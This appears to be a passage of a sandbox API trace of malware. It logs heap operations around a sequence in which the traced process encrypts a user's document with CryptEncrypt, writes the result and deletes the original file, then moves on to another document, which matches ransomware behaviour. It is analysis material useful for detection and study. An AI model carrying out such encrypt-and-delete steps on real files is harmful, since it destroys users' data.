[0078.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0078.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0078.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0078.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0078.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0078.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0078.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0078.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0078.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0078.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0078.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0078.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0078.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0078.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0078.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0078.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0078.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0078.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0078.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0078.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0078.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797028 [0078.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0078.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0078.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0078.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0078.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0078.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0078.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0078.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0078.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0078.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0078.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0078.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0078.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0078.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d88 [0078.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0078.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0078.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0078.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0078.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0078.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0078.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0078.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0078.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0078.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0078.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0078.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0078.861] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0078.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0078.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0078.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0078.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0078.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0078.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0078.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0078.862] CryptGetKeyParam (in: hKey=0x41ac280, dwParam=0x7, pbData=0x43e28e0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e28e0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0078.862] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0078.862] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.862] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0078.862] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.862] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0078.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caeb0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0078.862] CryptEncrypt (in: hKey=0x41ac280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x740a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x7410) returned 1 [0078.862] CharLowerBuffW (in: lpsz="byte[29713]", cchLength=0xb | out: lpsz="byte[29713]") returned 0xb [0078.863] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.863] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0078.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb2e8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0078.863] CryptEncrypt (in: hKey=0x41ac280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4905c90*, pdwDataLen=0x144e538*=0x740a, dwBufLen=0x7410 | out: pbData=0x4905c90*, pdwDataLen=0x144e538*=0x7410) returned 1 [0078.863] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0078.863] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0078.863] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.863] WriteFile (in: hFile=0x258, lpBuffer=0x492a118*, nNumberOfBytesToWrite=0x7410, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x492a118*, lpNumberOfBytesWritten=0x144ef3c*=0x7410, lpOverlapped=0x0) returned 1 [0078.865] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0078.865] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.865] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0078.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cad18, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0078.865] CryptDestroyKey (hKey=0x41ac280) returned 1 [0078.865] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0078.866] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0078.866] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.866] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0078.866] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0078.866] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.866] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.866] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0078.866] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0078.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0078.866] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0078.866] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.866] FreeLibrary (hLibModule=0x756e0000) returned 1 [0078.866] CloseHandle (hObject=0x298) returned 1 [0078.866] CloseHandle (hObject=0x258) returned 1 [0078.930] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\7QJQVMK.csv", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\7QJQVMK.csv", lpFilePart=0x0) returned 0x2c [0078.930] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\7QJQVMK.csv" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\7qjqvmk.csv")) returned 0x20 [0078.930] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\7QJQVMK.csv", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0bf4640, ftCreationTime.dwHighDateTime=0x1d5e8f3, ftLastAccessTime.dwLowDateTime=0xa7a67830, ftLastAccessTime.dwHighDateTime=0x1d5eb55, ftLastWriteTime.dwLowDateTime=0xa7a67830, ftLastWriteTime.dwHighDateTime=0x1d5eb55, nFileSizeHigh=0x0, nFileSizeLow=0x740a, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="7QJQVMK.csv", cAlternateFileName="")) returned 0x41ac280 [0078.931] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\7QJQVMK.csv" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\7qjqvmk.csv")) returned 1 [0078.940] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0bf4640, ftCreationTime.dwHighDateTime=0x1d5e8f3, ftLastAccessTime.dwLowDateTime=0xa7a67830, ftLastAccessTime.dwHighDateTime=0x1d5eb55, ftLastWriteTime.dwLowDateTime=0xa7a67830, ftLastWriteTime.dwHighDateTime=0x1d5eb55, nFileSizeHigh=0x0, nFileSizeLow=0x740a, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="7QJQVMK.csv", cAlternateFileName="")) returned 0 [0078.940] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0078.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0078.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0078.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0078.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0078.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359cd8 | out: hHeap=0x1780000) returned 1 [0078.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0078.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0078.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0078.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0078.941] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0078.941] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0078.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0078.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0078.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0078.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0078.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0078.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0078.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0078.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b22250 | out: hHeap=0x1780000) returned 1 [0078.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0078.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0078.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0078.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0078.941] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0078.943] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0078.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0078.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0078.943] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0078.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0078.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0078.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0078.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24c0 [0078.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0078.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0078.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0078.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0078.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0078.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0078.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0078.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0078.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0078.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0078.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0078.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0078.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0078.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d9ab0 [0078.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0078.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0078.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0078.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0078.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0078.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca250 [0078.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0078.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0078.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0078.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0078.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0078.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0078.945] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0078.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0078.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0078.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0078.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0078.945] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0078.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0078.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0078.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0078.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0078.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0078.945] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\cYT5WT.odt", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8c5f600, ftCreationTime.dwHighDateTime=0x1d5e646, ftLastAccessTime.dwLowDateTime=0x29ad7e90, ftLastAccessTime.dwHighDateTime=0x1d5e445, ftLastWriteTime.dwLowDateTime=0x29ad7e90, ftLastWriteTime.dwHighDateTime=0x1d5e445, nFileSizeHigh=0x0, nFileSizeLow=0x18b87, dwReserved0=0x101adf4, dwReserved1=0x8, cFileName="cYT5WT.odt", cAlternateFileName="")) returned 0x41ac640 [0078.945] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0078.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0078.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0078.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0078.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0078.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0078.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0078.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0078.946] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0078.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0078.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0078.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0078.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2380 [0078.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0078.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0078.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0078.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0078.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0078.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca238 [0078.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0078.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0078.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0078.946] HeapFree (in: hHeap=0x1780000, 